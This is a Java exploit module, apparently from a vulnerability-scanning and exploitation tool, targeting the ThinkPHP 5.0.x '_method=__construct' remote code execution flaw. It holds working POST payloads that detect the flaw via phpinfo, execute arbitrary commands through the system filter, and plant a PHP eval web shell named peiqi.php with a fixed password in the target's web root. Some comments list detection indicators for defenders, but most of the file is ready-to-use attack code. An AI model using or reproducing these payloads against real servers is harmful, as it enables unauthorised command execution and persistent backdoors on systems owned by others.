package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Module;
import util.Result;

import java.util.ArrayList;

/**
 * Author 莲花 2021/6/15
 */
//ThinkPHP <= 5.0.13
/**
 * Payload module for the ThinkPHP 5.0.x {@code _method=__construct} request
 * override (see the version-range comment above the class).
 *
 * <p>All three methods build the same target, {@code url + "/?s=" + module},
 * where {@code module} comes from {@link Module#getModule(String)}, and send a
 * POST whose body carries {@code _method=__construct} together with a
 * {@code filter[]=} parameter. From the defender's side those two tokens in a
 * POST body are the observable signature in access logs or WAF rules, and
 * {@code getShell} additionally leaves a {@code peiqi.php} file in the web root
 * that can be looked for directly.
 *
 * <p>Thread-safety: the class holds no state; each call creates its own
 * {@link Module} and {@link HttpRequest} objects.
 */
//ThinkPHP <= 5.0.13
public class tp5010 implements BasePayload {

    /**
     * Probes {@code url} by trying two {@code phpinfo} filter payloads and
     * looking for the string {@code "PHP Version"} in the response body.
     *
     * @param url base URL of the target, used without any normalisation
     *            (a trailing slash yields a {@code //?s=} path)
     * @return a {@link Result} whose first argument is {@code true} on the first
     *         payload that produced a matching body, carrying the URL and the
     *         payload in its third argument; otherwise a {@code false} result
     *         with an empty detail string
     */
    public Result checkVUL(String url) {
        String CheckStr = "PHP Version";
        Module m = new Module();
        String module = m.getModule(url);
        String payload_url = url + "/?s=" + module;

        // Double-brace initialisation: an anonymous ArrayList subclass that
        // also captures the enclosing instance. Kept as written.
        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&method=get&filter[]=phpinfo&get[]=-1");
            add("s=-1&_method=__construct&method=get&filter[]=phpinfo");
        }};

        for (String payload : payloads) {
            try {
                HttpRequest req = HttpRequest.post(payload_url).send(payload);
                if (req.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0.10 construct RCE", payload_url + " Post: " + payload);
                }
            } catch (Exception e) {
                // Network or HTTP errors are printed and the next payload is tried;
                // the caller only sees the final false result.
                e.printStackTrace();
            }
        }
        return new Result(false, "ThinkPHP 5.0.10 construct RCE", "");
    }

    /**
     * Sends {@code cmd} through the {@code system} filter and returns whatever
     * the response body contains before its first {@code '<'} character.
     *
     * <p>Behavioural notes grounded in the code below: {@code cmd} is placed in
     * the POST body without encoding; if the body contains no {@code '<'},
     * {@code indexOf} yields -1 and {@code substring} throws a
     * {@link StringIndexOutOfBoundsException}, which the catch block prints and
     * turns into the trailing {@code Result(false, null, null)}; if the prefix
     * is empty the whole body is returned instead.
     *
     * @param url base URL of the target
     * @param cmd command string inserted verbatim into the {@code s=} parameter
     * @return a {@code true} result carrying the extracted (or full) body, or
     *         {@code Result(false, null, null)} when the request or parsing failed
     * @throws Exception declared but not thrown by this body; every exception is
     *                   caught and printed
     */
    public Result exeVUL(String url, String cmd) throws Exception {
        Module m = new Module();
        String module = m.getModule(url);
        String payload_url = url + "/?s=" + module;
        String payload_rce = "s=" + cmd + "&_method=__construct&method&filter[]=system";
        try {
            String response = HttpRequest.post(payload_url).send(payload_rce).body();
            // Throws when '<' is absent (indexOf == -1); handled by the catch below.
            String res = response.substring(0, response.indexOf("<"));
            if (res.equals("")) {
                return new Result(true, "", response);
            }
            return new Result(true, "", res);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }


    /**
     * Tries five file-writing payloads in turn and, after each one, issues a
     * GET for {@code url + "/peiqi.php"}; the first payload after which that
     * GET returns HTTP 200 is reported as success.
     *
     * <p>Notes: the POST response body ({@code res}) is read but never
     * inspected, so success is judged solely by the follow-up status code, and
     * a pre-existing {@code peiqi.php} would also satisfy the check. On the
     * defender's side, a {@code peiqi.php} in the web root, or a GET for it
     * immediately following a POST with {@code _method=__construct}, is the
     * artefact this method leaves behind.
     *
     * @param url base URL of the target
     * @return a {@code true} result naming the written path and the POST
     *         parameter used, or {@code Result(false, null, null)} if no
     *         payload produced a 200 on the follow-up GET
     * @throws Exception declared but not thrown by this body; all exceptions
     *                   are caught and printed per payload
     */
    public Result getShell(String url) throws Exception {
        Module m = new Module();
        String module = m.getModule(url);
        String payload_url = url + "/?s=" + module;

        // Same double-brace initialisation pattern as in checkVUL.
        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&filter[]=system&mytest=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
            add("_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');");
            add("_method=__construct&method=get&filter[]=assert&get[]=/*1111*//***/file_put_contents/*1**/(/***/'./peiqi.php',/***/'<?php%20@eval($_POST[%27peiqi%27])?>'/***/);');");
            add("s=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');&_method=__construct&method=&filter[]=assert");
            add("_method=__construct&method=get&filter[]=assert&get[]=copy('<?php%20@eval($_POST[%27peiqi%27])?>', './peiqi.php');");
        }};
        for (String payload : payloads) {
            try {
                // Response body is fetched but not used; only the GET below decides.
                String res = HttpRequest.post(payload_url).send(payload).body();
                int code = HttpRequest.get(url + "/peiqi.php").code();
                if (code == 200) {
                    return new Result(true, "", url + "/peiqi.php   Pass:peiqi");
                }
            } catch (Exception e) {
                // Printed and ignored so the remaining payloads are still attempted.
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

}
